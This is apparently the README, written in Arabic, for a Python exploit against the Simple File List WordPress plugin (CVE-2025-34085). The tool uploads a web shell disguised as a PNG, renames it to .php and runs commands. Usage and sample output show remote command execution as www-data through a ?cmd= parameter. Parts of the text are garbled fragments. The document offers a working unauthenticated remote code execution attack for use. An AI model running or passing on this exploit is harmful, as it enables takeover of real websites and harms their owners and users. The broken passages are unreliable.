
Simple File List – استغلال RCE غير مصادق عليه (CVE-2025-34085)
⚠️ كود الاستغلال بواسطة: Mrj Haxcore
استغلال بايثون يعمل بكامل طاقته لإضافة Simple File List في ووردبريس (<= 4.2.3)، والتي تعاني من ثغرة تنفيذ التعليمات البرمجية عن بعد غير مصادق (RCE) بسبب منطق غير آمن لرفع الملفات وإعادة تسميتها.
simple-file-list).png، ثم إعادة تسميته إلى .php وتنفيذ تعليمات برمجية عشوائية.multipart/form-data يدوي (يتجاوز الخطأ 415).php و .php5 و .phtml إلخ.?cmd=�PNG)python3 simple.py https://target.site
[+] Uploading shell as 8dkls0qp.png...
[+] Upload successful.
[+] Trying to rename to: 8dkls0qp.php...
[+] Rename successful: 8dkls0qp.php
[+] Triggering shell: https://target.site/wp-content/uploads/simple-file-list/8dkls0qp.php?cmd=id
[+] Shell output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Manual Visit
https://target.site/wp-content/uploads/simple-file-list/8dkls0qp.php?cmd=whoami